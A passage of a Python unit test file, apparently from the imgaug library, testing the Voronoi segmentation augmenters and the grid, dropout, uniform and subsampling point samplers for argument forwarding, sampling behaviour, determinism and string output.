        sampler = iaa.RegularGridPointsSampler(50, 50)
        aug = iaa.Voronoi(sampler, p_replace=0.0)
        mock_segment_voronoi = mock.MagicMock()
        mock_segment_voronoi.return_value = image[..., np.newaxis]
        fname = "imgaug.augmenters.segmentation.segment_voronoi"
        with mock.patch(fname, mock_segment_voronoi):
            _image_aug = aug(image=image)
        # third positional argument of segment_voronoi() is the replace mask
        replace_mask = mock_segment_voronoi.call_args_list[0][0][2]
        assert not np.any(replace_mask)
    def test_p_replace_is_one(self):
        image = np.zeros((50, 50), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(50, 50)
        aug = iaa.Voronoi(sampler, p_replace=1.0)
        mock_segment_voronoi = mock.MagicMock()
        mock_segment_voronoi.return_value = image[..., np.newaxis]
        fname = "imgaug.augmenters.segmentation.segment_voronoi"
        with mock.patch(fname, mock_segment_voronoi):
            _image_aug = aug(image=image)
        replace_mask = mock_segment_voronoi.call_args_list[0][0][2]
        assert np.all(replace_mask)
    def test_p_replace_is_50_percent(self):
        image = np.zeros((200, 200), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(200, 200)
        aug = iaa.Voronoi(sampler, p_replace=0.5)
        mock_segment_voronoi = mock.MagicMock()
        mock_segment_voronoi.return_value = image[..., np.newaxis]
        fname = "imgaug.augmenters.segmentation.segment_voronoi"
        with mock.patch(fname, mock_segment_voronoi):
            _image_aug = aug(image=image)
        replace_mask = mock_segment_voronoi.call_args_list[0][0][2]
        # with 200x200 cells the observed fraction should be close to 0.5
        replace_fraction = np.average(replace_mask.astype(np.float32))
        assert 0.4 <= replace_fraction <= 0.6
    def test_determinism_integrationtest(self):
        # build an image with distinct values per pixel and channel
        image = np.arange(10*20).astype(np.uint8).reshape((10, 20, 1))
        image = np.tile(image, (1, 1, 3))
        image[:, :, 1] += 5
        image[:, :, 2] += 10
        sampler = iaa.DropoutPointsSampler(
            iaa.RegularGridPointsSampler((1, 10), (1, 20)),
            0.5
        )
        aug = iaa.Voronoi(sampler, p_replace=(0.0, 1.0))
        aug_det = aug.to_deterministic()
        images_aug_a1 = aug(images=[image] * 50)
        images_aug_a2 = aug(images=[image] * 50)
        images_aug_b1 = aug_det(images=[image] * 50)
        images_aug_b2 = aug_det(images=[image] * 50)
        same_within_a1 = _all_arrays_identical(images_aug_a1)
        same_within_a2 = _all_arrays_identical(images_aug_a2)
        same_within_b1 = _all_arrays_identical(images_aug_b1)
        same_within_b2 = _all_arrays_identical(images_aug_b2)
        same_between_a1_a2 = _array_lists_elementwise_identical(images_aug_a1,
                                                                images_aug_a2)
        same_between_b1_b2 = _array_lists_elementwise_identical(images_aug_b1,
                                                                images_aug_b2)
        # results must vary within every batch ...
        assert not same_within_a1
        assert not same_within_a2
        assert not same_within_b1
        assert not same_within_b2
        # ... and between batches of the stochastic augmenter, while the
        # deterministic clone reproduces the same batch exactly
        assert not same_between_a1_a2
        assert same_between_b1_b2
    def test_get_parameters(self):
        sampler = iaa.RegularGridPointsSampler(1, 1)
        aug = iaa.Voronoi(sampler, p_replace=0.5, max_size=None,
                          interpolation="cubic")
        params = aug.get_parameters()
        # order: points_sampler, p_replace, max_size, interpolation
        assert params[0] is sampler
        assert isinstance(params[1], iap.Binomial)
        assert np.isclose(params[1].p.value, 0.5)
        assert params[2] is None
        assert params[3] == "cubic"
def _all_arrays_identical(arrs):
if len(arrs) == 1:
return True
return np.all([np.array_equal(arrs[0], arr_other)
for arr_other in arrs[1:]])
def _array_lists_elementwise_identical(arrs1, arrs2):
return np.all([np.array_equal(arr1, arr2)
for arr1, arr2 in zip(arrs1, arrs2)])
class TestUniformVoronoi(unittest.TestCase):
    """Tests for ``UniformVoronoi`` (Voronoi with uniformly sampled points)."""
    def test___init___(self):
        rs = np.random.RandomState(10)
        # patch the parent Voronoi ctor so only argument forwarding is checked
        mock_voronoi = mock.MagicMock()
        mock_voronoi.return_value = mock_voronoi
        fname = "imgaug.augmenters.segmentation.Voronoi.__init__"
        with mock.patch(fname, mock_voronoi):
            _ = iaa.UniformVoronoi(
                100,
                p_replace=0.5,
                max_size=5,
                interpolation="cubic",
                name="foo",
                deterministic=True,
                random_state=rs
            )
        assert mock_voronoi.call_count == 1
        # everything must be forwarded as keyword arguments
        assert isinstance(mock_voronoi.call_args_list[0][1]["points_sampler"],
                          iaa.UniformPointsSampler)
        assert np.isclose(mock_voronoi.call_args_list[0][1]["p_replace"],
                          0.5)
        assert mock_voronoi.call_args_list[0][1]["max_size"] == 5
        assert mock_voronoi.call_args_list[0][1]["interpolation"] == "cubic"
        assert mock_voronoi.call_args_list[0][1]["name"] == "foo"
        assert mock_voronoi.call_args_list[0][1]["deterministic"] is True
        assert mock_voronoi.call_args_list[0][1]["random_state"] is rs
    def test___init___integrationtest(self):
        rs = iarandom.RNG(10)
        aug = iaa.UniformVoronoi(
            100,
            p_replace=0.5,
            max_size=5,
            interpolation="cubic",
            name=None,
            deterministic=True,
            random_state=rs
        )
        assert aug.points_sampler.n_points.value == 100
        assert np.isclose(aug.p_replace.p.value, 0.5)
        assert aug.max_size == 5
        assert aug.interpolation == "cubic"
        # name=None falls back to an auto-generated name
        assert aug.name == "UnnamedUniformVoronoi"
        assert aug.deterministic is True
        assert aug.random_state.equals(rs)
class TestRegularGridVoronoi(unittest.TestCase):
    """Tests for ``RegularGridVoronoi`` (regular grid sampler + point dropout)."""
    def test___init___(self):
        rs = np.random.RandomState(10)
        # patch the parent Voronoi ctor so only argument forwarding is checked
        mock_voronoi = mock.MagicMock()
        mock_voronoi.return_value = mock_voronoi
        fname = "imgaug.augmenters.segmentation.Voronoi.__init__"
        with mock.patch(fname, mock_voronoi):
            _ = iaa.RegularGridVoronoi(
                10,
                20,
                p_drop_points=0.6,
                p_replace=0.5,
                max_size=5,
                interpolation="cubic",
                name="foo",
                deterministic=True,
                random_state=rs
            )
        assert mock_voronoi.call_count == 1
        ps = mock_voronoi.call_args_list[0][1]["points_sampler"]
        assert isinstance(ps, iaa.DropoutPointsSampler)
        assert isinstance(ps.other_points_sampler,
                          iaa.RegularGridPointsSampler)
        # the dropout sampler stores the keep probability, i.e.
        # 1 - p_drop_points (cp. the repr test in TestDropoutPointsSampler)
        assert np.isclose(ps.p_drop.p.value, 1-0.6)
        assert ps.other_points_sampler.n_rows.value == 10
        assert ps.other_points_sampler.n_cols.value == 20
        assert np.isclose(mock_voronoi.call_args_list[0][1]["p_replace"],
                          0.5)
        assert mock_voronoi.call_args_list[0][1]["max_size"] == 5
        assert mock_voronoi.call_args_list[0][1]["interpolation"] == "cubic"
        assert mock_voronoi.call_args_list[0][1]["name"] == "foo"
        assert mock_voronoi.call_args_list[0][1]["deterministic"] is True
        assert mock_voronoi.call_args_list[0][1]["random_state"] is rs
    def test___init___integrationtest(self):
        rs = iarandom.RNG(10)
        aug = iaa.RegularGridVoronoi(
            10,
            (10, 30),
            p_replace=0.5,
            max_size=5,
            interpolation="cubic",
            name=None,
            deterministic=True,
            random_state=rs
        )
        # 1-0.4 implies a default p_drop_points of 0.4 -- confirm in ctor
        assert np.isclose(aug.points_sampler.p_drop.p.value, 1-0.4)
        assert aug.points_sampler.other_points_sampler.n_rows.value == 10
        # a (10, 30) tuple becomes a DiscreteUniform for the column count
        assert isinstance(aug.points_sampler.other_points_sampler.n_cols,
                          iap.DiscreteUniform)
        assert aug.points_sampler.other_points_sampler.n_cols.a.value == 10
        assert aug.points_sampler.other_points_sampler.n_cols.b.value == 30
        assert np.isclose(aug.p_replace.p.value, 0.5)
        assert aug.max_size == 5
        assert aug.interpolation == "cubic"
        assert aug.name == "UnnamedRegularGridVoronoi"
        assert aug.deterministic is True
        assert aug.random_state.equals(rs)
class TestRelativeRegularGridVoronoi(unittest.TestCase):
    """Tests for ``RelativeRegularGridVoronoi``.

    Grid sizes are given as fractions of the image height/width instead of
    absolute row/column counts.
    """
    def test___init___(self):
        rs = np.random.RandomState(10)
        # patch the parent Voronoi ctor so only argument forwarding is checked
        mock_voronoi = mock.MagicMock()
        mock_voronoi.return_value = mock_voronoi
        fname = "imgaug.augmenters.segmentation.Voronoi.__init__"
        with mock.patch(fname, mock_voronoi):
            _ = iaa.RelativeRegularGridVoronoi(
                0.1,
                0.2,
                p_drop_points=0.6,
                p_replace=0.5,
                max_size=5,
                interpolation="cubic",
                name="foo",
                deterministic=True,
                random_state=rs
            )
        assert mock_voronoi.call_count == 1
        ps = mock_voronoi.call_args_list[0][1]["points_sampler"]
        assert isinstance(ps, iaa.DropoutPointsSampler)
        assert isinstance(ps.other_points_sampler,
                          iaa.RelativeRegularGridPointsSampler)
        # the dropout sampler stores the keep probability (1 - p_drop_points)
        assert np.isclose(ps.p_drop.p.value, 1-0.6)
        assert np.isclose(ps.other_points_sampler.n_rows_frac.value, 0.1)
        assert np.isclose(ps.other_points_sampler.n_cols_frac.value, 0.2)
        assert np.isclose(mock_voronoi.call_args_list[0][1]["p_replace"],
                          0.5)
        assert mock_voronoi.call_args_list[0][1]["max_size"] == 5
        assert mock_voronoi.call_args_list[0][1]["interpolation"] == "cubic"
        assert mock_voronoi.call_args_list[0][1]["name"] == "foo"
        assert mock_voronoi.call_args_list[0][1]["deterministic"] is True
        assert mock_voronoi.call_args_list[0][1]["random_state"] is rs
    def test___init___integrationtest(self):
        rs = iarandom.RNG(10)
        aug = iaa.RelativeRegularGridVoronoi(
            0.1,
            (0.1, 0.3),
            p_replace=0.5,
            max_size=5,
            interpolation="cubic",
            name=None,
            deterministic=True,
            random_state=rs
        )
        ps = aug.points_sampler
        # 1-0.4 implies a default p_drop_points of 0.4 -- confirm in ctor
        assert np.isclose(aug.points_sampler.p_drop.p.value, 1-0.4)
        assert np.isclose(ps.other_points_sampler.n_rows_frac.value, 0.1)
        # a (0.1, 0.3) tuple becomes a continuous Uniform for the fraction
        assert isinstance(ps.other_points_sampler.n_cols_frac, iap.Uniform)
        assert np.isclose(ps.other_points_sampler.n_cols_frac.a.value, 0.1)
        assert np.isclose(ps.other_points_sampler.n_cols_frac.b.value, 0.3)
        assert np.isclose(aug.p_replace.p.value, 0.5)
        assert aug.max_size == 5
        assert aug.interpolation == "cubic"
        assert aug.name == "UnnamedRelativeRegularGridVoronoi"
        assert aug.deterministic is True
        assert aug.random_state.equals(rs)
# TODO verify behaviours when image height/width is zero
class TestRegularGridPointSampler(unittest.TestCase):
    """Tests for ``RegularGridPointsSampler`` (points on a regular grid)."""
    def setUp(self):
        # reset the global random state so tests are reproducible
        reseed()
    def test___init___(self):
        sampler = iaa.RegularGridPointsSampler((1, 10), 20)
        # first ctor argument is n_rows, second is n_cols; tuples become
        # DiscreteUniform parameters
        assert isinstance(sampler.n_rows, iap.DiscreteUniform)
        assert sampler.n_rows.a.value == 1
        assert sampler.n_rows.b.value == 10
        assert sampler.n_cols.value == 20
    def test_sample_single_point(self):
        image = np.zeros((10, 20, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(1, 1)
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        # a 1x1 grid places its single point at the image center; points
        # are returned in (x, y) order
        assert len(points) == 1
        assert np.allclose(points[0], [10.0, 5.0])
    def test_sample_points(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(2, 2)
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        assert len(points) == 4
        assert np.allclose(points, [
            [0.0, 0.0],
            [10.0, 0.0],
            [0.0, 10.0],
            [10.0, 10.0]
        ])
    def test_sample_points_stochastic(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(1, iap.Choice([1, 2]))
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        # either a single center point or two points, depending on the
        # sampled column count
        matches_single_point = np.allclose(points, [
            [5.0, 5.0]
        ])
        matches_two_points = np.allclose(points, [
            [0.0, 5.0],
            [10.0, 5.0]
        ])
        assert len(points) in [1, 2]
        assert matches_single_point or matches_two_points
    def test_sample_points_cols_is_zero(self):
        # NOTE(review): the first ctor argument is n_rows (see
        # test___init___), so this effectively tests n_rows=0; the name
        # and the sibling test below appear to be swapped -- confirm.
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(iap.Deterministic(0), 1)
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        # a zero-sized grid is clipped to a 1x1 grid (one center point)
        matches_single_point = np.allclose(points, [
            [5.0, 5.0]
        ])
        assert len(points) == 1
        assert matches_single_point
    def test_sample_points_rows_is_zero(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(1, iap.Deterministic(0))
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        matches_single_point = np.allclose(points, [
            [5.0, 5.0]
        ])
        assert len(points) == 1
        assert matches_single_point
    def test_sample_points_rows_is_more_than_image_height(self):
        image = np.zeros((1, 1, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(2, 1)
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        # grid sizes are clipped to the image size (here 1x1)
        matches_single_point = np.allclose(points, [
            [0.5, 0.5]
        ])
        assert len(points) == 1
        assert matches_single_point
    def test_sample_points_cols_is_more_than_image_width(self):
        image = np.zeros((1, 1, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(1, 2)
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        matches_single_point = np.allclose(points, [
            [0.5, 0.5]
        ])
        assert len(points) == 1
        assert matches_single_point
    def test_determinism(self):
        image = np.zeros((500, 500, 1), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler((1, 500), (1, 500))
        points_seed1_1 = sampler.sample_points([image], 1)[0]
        points_seed1_2 = sampler.sample_points([image], 1)[0]
        points_seed2_1 = sampler.sample_points([image], 2)[0]
        # same seed -> same grid size; different seed -> different size
        assert points_seed1_1.shape == points_seed1_2.shape
        assert points_seed1_1.shape != points_seed2_1.shape
    def test_conversion_to_string(self):
        sampler = iaa.RegularGridPointsSampler(10, (10, 30))
        expected = (
            "RegularGridPointsSampler("
            "Deterministic(int 10), "
            "DiscreteUniform(Deterministic(int 10), Deterministic(int 30))"
            ")"
        )
        assert sampler.__str__() == sampler.__repr__() == expected
class TestRelativeRegularGridPointSampler(unittest.TestCase):
    """Tests for ``RelativeRegularGridPointsSampler``.

    Grid size is given as a fraction of the image size, e.g. a fraction of
    0.2 on a 10x10 image yields a 2x2 grid (see test_sample_points).
    """
    def setUp(self):
        # reset the global random state so tests are reproducible
        reseed()
    def test___init___(self):
        sampler = iaa.RelativeRegularGridPointsSampler((0.1, 0.2), 0.1)
        # tuples become continuous Uniform parameters for the fractions
        assert isinstance(sampler.n_rows_frac, iap.Uniform)
        assert np.isclose(sampler.n_rows_frac.a.value, 0.1)
        assert np.isclose(sampler.n_rows_frac.b.value, 0.2)
        assert np.isclose(sampler.n_cols_frac.value, 0.1)
    def test_sample_single_point(self):
        image = np.zeros((10, 20, 3), dtype=np.uint8)
        # fractions small enough that the grid collapses to a single point
        sampler = iaa.RelativeRegularGridPointsSampler(0.001, 0.001)
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        assert len(points) == 1
        assert np.allclose(points[0], [10.0, 5.0])
    def test_sample_points(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.RelativeRegularGridPointsSampler(0.2, 0.2)
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        # 0.2 * 10px = 2 rows and 2 cols -> 4 grid points
        assert len(points) == 4
        assert np.allclose(points, [
            [0.0, 0.0],
            [10.0, 0.0],
            [0.0, 10.0],
            [10.0, 10.0]
        ])
    def test_sample_points_stochastic(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.RelativeRegularGridPointsSampler(0.1,
                                                       iap.Choice([0.1, 0.2]))
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        matches_single_point = np.allclose(points, [
            [5.0, 5.0]
        ])
        matches_two_points = np.allclose(points, [
            [0.0, 5.0],
            [10.0, 5.0]
        ])
        assert len(points) in [1, 2]
        assert matches_single_point or matches_two_points
    def test_sample_points_cols_is_zero(self):
        # NOTE(review): the first ctor argument is n_rows_frac (see
        # test___init___), so this effectively tests ~zero *rows*; the
        # name and the sibling test below appear to be swapped -- confirm.
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.RelativeRegularGridPointsSampler(iap.Deterministic(0.001),
                                                       0.1)
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        # a near-zero fraction still yields at least one point
        matches_single_point = np.allclose(points, [
            [5.0, 5.0]
        ])
        assert len(points) == 1
        assert matches_single_point
    def test_sample_points_rows_is_zero(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.RelativeRegularGridPointsSampler(0.1,
                                                       iap.Deterministic(0.001))
        points = sampler.sample_points([image], np.random.RandomState(1))[0]
        matches_single_point = np.allclose(points, [
            [5.0, 5.0]
        ])
        assert len(points) == 1
        assert matches_single_point
    def test_determinism(self):
        image = np.zeros((500, 500, 1), dtype=np.uint8)
        sampler = iaa.RelativeRegularGridPointsSampler((0.01, 1.0), (0.1, 1.0))
        points_seed1_1 = sampler.sample_points([image], 1)[0]
        points_seed1_2 = sampler.sample_points([image], 1)[0]
        points_seed2_1 = sampler.sample_points([image], 2)[0]
        # same seed -> same grid size; different seed -> different size
        assert points_seed1_1.shape == points_seed1_2.shape
        assert points_seed1_1.shape != points_seed2_1.shape
    def test_conversion_to_string(self):
        sampler = iaa.RelativeRegularGridPointsSampler(0.01, (0.01, 0.05))
        expected = (
            "RelativeRegularGridPointsSampler("
            "Deterministic(float 0.01000000), "
            "Uniform("
            "Deterministic(float 0.01000000), "
            "Deterministic(float 0.05000000)"
            ")"
            ")"
        )
        assert sampler.__str__() == sampler.__repr__() == expected
class _FixedPointsSampler(iaa.PointsSamplerIf):
    """Test helper: a points sampler that always returns a fixed point set.

    It also records the ``random_state`` of the most recent
    ``sample_points()`` call so that tests can verify that random states
    are propagated to wrapped samplers.
    """
    def __init__(self, points):
        # copy to protect against later in-place modification by the caller;
        # points is expected as an (N, 2) array-like of xy-coordinates
        self.points = np.float32(np.copy(points))
        self.last_random_state = None
    def sample_points(self, images, random_state):
        self.last_random_state = random_state
        # Return one copy of the fixed points per image, i.e. shape
        # (len(images), N, 2). The previous reps tuple ``(len(images), 1)``
        # was left-padded by np.tile to ``(1, len(images), 1)`` and hence
        # concatenated all copies into a single row -- correct only for
        # the single-image case.
        return np.tile(self.points[np.newaxis, ...], (len(images), 1, 1))
class TestDropoutPointsSampler(unittest.TestCase):
    """Tests for ``DropoutPointsSampler`` (randomly removes sampled points)."""
    def setUp(self):
        # reset the global random state so tests are reproducible
        reseed()
    def test___init__(self):
        other = iaa.RegularGridPointsSampler(1, 1)
        sampler = iaa.DropoutPointsSampler(other, 0.5)
        assert sampler.other_points_sampler is other
        assert isinstance(sampler.p_drop, iap.Binomial)
        assert np.isclose(sampler.p_drop.p.value, 0.5)
    def test_p_drop_is_0_percent(self):
        image = np.zeros((1, 1, 3), dtype=np.uint8)
        points = np.linspace(0.0, 1000.0, num=100000)
        points = np.stack([points, points], axis=-1)
        other = _FixedPointsSampler(points)
        sampler = iaa.DropoutPointsSampler(other, 0.0)
        observed = sampler.sample_points([image], 1)[0]
        # p_drop=0: every point survives, order preserved
        assert np.allclose(observed, points)
    def test_p_drop_is_100_percent(self):
        image = np.zeros((1, 1, 3), dtype=np.uint8)
        points = np.linspace(0.0+0.9, 1000.0-0.9, num=100000)
        points = np.stack([points, points], axis=-1)
        other = _FixedPointsSampler(points)
        sampler = iaa.DropoutPointsSampler(other, 1.0)
        observed = sampler.sample_points([image], 1)[0]
        eps = 1e-4
        # even with p_drop=1.0 a single point is kept (presumably so that
        # downstream code never sees an empty point list); it must lie
        # within the coordinate range covered by the input points
        assert len(observed) == 1
        assert 0.0 + 0.9 - eps <= observed[0][0] <= 1000.0 - 0.9 + eps
        assert 0.0 + 0.9 - eps <= observed[0][1] <= 1000.0 - 0.9 + eps
    def test_p_drop_is_50_percent(self):
        image = np.zeros((1, 1, 3), dtype=np.uint8)
        points = np.linspace(0.0+0.9, 1000.0-0.9, num=100000)
        points = np.stack([points, points], axis=-1)
        other = _FixedPointsSampler(points)
        sampler = iaa.DropoutPointsSampler(other, 0.5)
        observed = sampler.sample_points([image], 1)[0]
        # roughly half of the 100k points, with generous tolerance
        assert 50000 - 1000 <= len(observed) <= 50000 + 1000
    def test_determinism(self):
        image = np.zeros((1, 1, 3), dtype=np.uint8)
        points = np.linspace(0.0+0.9, 1000.0-0.9, num=100000)
        points = np.stack([points, points], axis=-1)
        other = _FixedPointsSampler(points)
        sampler = iaa.DropoutPointsSampler(other, (0.3, 0.7))
        observed_s1_1 = sampler.sample_points([image], 1)[0]
        observed_s1_2 = sampler.sample_points([image], 1)[0]
        observed_s2_1 = sampler.sample_points([image], 2)[0]
        # same seed -> identical result; different seed -> different result
        assert np.allclose(observed_s1_1, observed_s1_2)
        assert (observed_s1_1.shape != observed_s2_1.shape
                or not np.allclose(observed_s1_1, observed_s2_1))
    def test_random_state_propagates(self):
        image = np.zeros((1, 1, 3), dtype=np.uint8)
        points = np.linspace(0.0+0.9, 1000.0-0.9, num=1)
        points = np.stack([points, points], axis=-1)
        other = _FixedPointsSampler(points)
        sampler = iaa.DropoutPointsSampler(other, 0.5)
        _ = sampler.sample_points([image], 1)[0]
        rs_s1_1 = other.last_random_state
        _ = sampler.sample_points([image], 1)[0]
        rs_s1_2 = other.last_random_state
        _ = sampler.sample_points([image], 2)[0]
        rs_s2_1 = other.last_random_state
        # the wrapped sampler must receive a random state derived from the
        # seed given to the outer sampler
        assert rs_s1_1.equals(rs_s1_2)
        assert not rs_s1_1.equals(rs_s2_1)
    def test_conversion_to_string(self):
        sampler = iaa.DropoutPointsSampler(
            iaa.RegularGridPointsSampler(10, 20),
            0.2
        )
        # note: p_drop=0.2 appears in the repr as Binomial(0.8), i.e. as
        # the keep probability
        expected = (
            "DropoutPointsSampler("
            "RegularGridPointsSampler("
            "Deterministic(int 10), "
            "Deterministic(int 20)"
            "), "
            "Binomial(Deterministic(float 0.80000000))"
            ")"
        )
        assert sampler.__str__() == sampler.__repr__() == expected
class TestUniformPointsSampler(unittest.TestCase):
    """Tests for ``UniformPointsSampler`` (uniformly random point placement)."""
    def setUp(self):
        # reset the global random state so tests are reproducible
        reseed()
    def test___init__(self):
        sampler = iaa.UniformPointsSampler(100)
        assert isinstance(sampler.n_points, iap.Deterministic)
        assert sampler.n_points.value == 100
    def test_sampled_points_not_identical(self):
        sampler = iaa.UniformPointsSampler(3)
        images = [np.zeros((1000, 1000, 3), dtype=np.uint8)]
        points = sampler.sample_points(images, 1)[0]
        points_tpls = [tuple(point) for point in points]
        n_points = len(points)
        n_points_uq = len(set(points_tpls))
        # all three sampled points must be distinct
        assert n_points == 3
        assert n_points_uq == 3
    def test_sampled_points_uniformly_distributed_by_quadrants(self):
        # split image into 2x2 quadrants, group all points per quadrant,
        # assume that at least around N_points/(2*2) points are in each
        # quadrant
        sampler = iaa.UniformPointsSampler(10000)
        images = [np.zeros((1000, 3000, 1), dtype=np.uint8)]
        points = sampler.sample_points(images, 1)[0]
        points_rel = points.astype(np.float32)
        points_rel[:, 1] /= 1000
        points_rel[:, 0] /= 3000
        points_quadrants = np.clip(
            np.floor(points_rel * 2),
            0, 1
        ).astype(np.int32)
        n_points_per_quadrant = np.zeros((2, 2), dtype=np.int32)
        np.add.at(
            n_points_per_quadrant,
            (points_quadrants[:, 1], points_quadrants[:, 0]),
            1)
        assert np.all(n_points_per_quadrant > 0.8*(10000/4))
    def test_sampled_points_uniformly_distributed_by_distance_from_origin(self):
        # Sample N points, compute distances from origin each axis,
        # split into B bins, assume that each bin contains at least around
        # N/B points.
        sampler = iaa.UniformPointsSampler(10000)
        images = [np.zeros((1000, 3000, 1), dtype=np.uint8)]
        points = sampler.sample_points(images, 1)[0]
        points_rel = points.astype(np.float32)
        points_rel[:, 1] /= 1000
        points_rel[:, 0] /= 3000
        points_bins = np.clip(
            np.floor(points_rel * 10),
            # clip into the valid bin indices 0..9; the previous upper
            # bound of 1 collapsed the ten intended bins into just two,
            # making the per-bin assertions below trivially satisfiable
            0, 9
        ).astype(np.int32)
        # Don't use euclidean (2d) distance here, but instead axis-wise (1d)
        # distance. The euclidean distance leads to non-uniform density of
        # distances, because points on the same "circle" have the same
        # distance, and there are less points close/far away from the origin
        # that fall on the same circle.
        points_bincounts_x = np.bincount(points_bins[:, 0])
        points_bincounts_y = np.bincount(points_bins[:, 1])
        assert np.all(points_bincounts_x > 0.8*(10000/10))
        assert np.all(points_bincounts_y > 0.8*(10000/10))
    def test_many_images(self):
        sampler = iaa.UniformPointsSampler(1000)
        images = [
            np.zeros((100, 500, 3), dtype=np.uint8),
            np.zeros((500, 100, 1), dtype=np.uint8)
        ]
        points = sampler.sample_points(images, 1)
        assert len(points) == 2
        assert len(points[0]) == 1000
        assert len(points[1]) == 1000
        assert not np.allclose(points[0], points[1])
        # points must roughly cover each image's full extent; axis order
        # is (x, y)
        assert np.any(points[0][:, 1] < 20)
        assert np.any(points[0][:, 1] > 0.9*100)
        assert np.any(points[0][:, 0] < 20)
        assert np.any(points[0][:, 0] > 0.9*500)
        assert np.any(points[1][:, 1] < 20)
        assert np.any(points[1][:, 1] > 0.9*500)
        assert np.any(points[1][:, 0] < 20)
        assert np.any(points[1][:, 0] > 0.9*100)
    def test_always_at_least_one_point(self):
        # n_points=0 is clipped to a single point
        sampler = iaa.UniformPointsSampler(iap.Deterministic(0))
        images = [np.zeros((10, 10, 1), dtype=np.uint8)]
        points = sampler.sample_points(images, 1)[0]
        assert len(points) == 1
    def test_n_points_can_vary_between_calls(self):
        sampler = iaa.UniformPointsSampler(iap.Choice([1, 10]))
        images = [np.zeros((10, 10, 1), dtype=np.uint8)]
        seen = {1: False, 10: False}
        for i in sm.xrange(50):
            points = sampler.sample_points(images, i)[0]
            seen[len(points)] = True
            # use the builtin all() here: np.all() would wrap the
            # dict_values view in a 0-d object array and reduce it to the
            # view's truthiness, which is always True for a non-empty
            # dict -- the loop then exited after one iteration and the
            # final assertion below could never fail
            if all(seen.values()):
                break
        assert len(list(seen.keys())) == 2
        assert all(seen.values())
    def test_n_points_can_vary_between_images(self):
        sampler = iaa.UniformPointsSampler(iap.Choice([1, 10]))
        images = [
            np.zeros((10, 10, 1), dtype=np.uint8)
            for _ in sm.xrange(50)]
        points = sampler.sample_points(images, 1)
        point_counts = set([len(points_i) for points_i in points])
        # with 50 images, both point counts should occur
        assert len(points) == 50
        assert len(list(point_counts)) == 2
        assert 1 in point_counts
        assert 10 in point_counts
    def test_determinism(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        sampler = iaa.UniformPointsSampler(100)
        observed_s1_1 = sampler.sample_points([image], 1)[0]
        observed_s1_2 = sampler.sample_points([image], 1)[0]
        observed_s2_1 = sampler.sample_points([image], 2)[0]
        # same seed -> identical points; different seed -> different points
        assert np.allclose(observed_s1_1, observed_s1_2)
        assert not np.allclose(observed_s1_1, observed_s2_1)
    def test_conversion_to_string(self):
        sampler = iaa.UniformPointsSampler(10)
        expected = "UniformPointsSampler(Deterministic(int 10))"
        assert sampler.__str__() == sampler.__repr__() == expected
class TestSubsamplingPointSampler(unittest.TestCase):
    """Tests for ``SubsamplingPointsSampler`` (caps the number of points)."""
    def setUp(self):
        # reset the global random state so tests are reproducible
        reseed()
    def test___init__(self):
        other = iaa.RegularGridPointsSampler(1, 1)
        sampler = iaa.SubsamplingPointsSampler(other, 100)
        assert sampler.other_points_sampler is other
        assert sampler.n_points_max == 100
    def test_max_is_zero(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        other = iaa.RegularGridPointsSampler(2, 2)
        # n_points_max=0 must produce zero points and emit exactly one
        # warning mentioning the problematic value
        with warnings.catch_warnings(record=True) as caught_warnings:
            sampler = iaa.SubsamplingPointsSampler(other, 0)
            observed = sampler.sample_points([image], 1)[0]
        assert len(observed) == 0
        assert len(caught_warnings) == 1
        assert "n_points_max=0" in str(caught_warnings[-1].message)
    def test_max_is_above_point_count(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        other = iaa.RegularGridPointsSampler(2, 2)
        sampler = iaa.SubsamplingPointsSampler(other, 100)
        observed = sampler.sample_points([image], 1)[0]
        # 4 grid points < max 100 -> all points pass through unchanged
        assert len(observed) == 4
        assert np.allclose(observed, [
            [0.0, 0.0],
            [10.0, 0.0],
            [0.0, 10.0],
            [10.0, 10.0]
        ])
    def test_max_is_below_point_count(self):
        # NOTE(review): with n_points_max=1000 and only 5*5=25 points the
        # maximum is actually *above* the point count here, so no
        # subsampling happens; the name and values look inconsistent --
        # confirm whether e.g. n_points_max=10 was intended.
        image = np.zeros((10, 10, 3), dtype=np.uint8)
        other = iaa.RegularGridPointsSampler(5, 5)
        sampler = iaa.SubsamplingPointsSampler(other, 1000)
        observed = sampler.sample_points([image], 1)[0]
        assert len(observed) == 5*5
    def test_max_is_sometimes_below_point_count(self):
        image = np.zeros((1, 10, 3), dtype=np.uint8)
        other = iaa.RegularGridPointsSampler(1, (9, 11))
        sampler = iaa.SubsamplingPointsSampler(other, 1000)
        observed = sampler.sample_points([image] * 100, 1)
        counts = [len(observed_i) for observed_i in observed]
        counts_uq = set(counts)
        # 11 never appears: the grid sampler clips n_cols to the image
        # width of 10; note that n_points_max=1000 never triggers
        # subsampling here -- confirm whether a smaller max was intended
        assert 9 in counts_uq
        assert 10 in counts_uq
        assert 11 not in counts_uq
    def test_random_state_propagates(self):
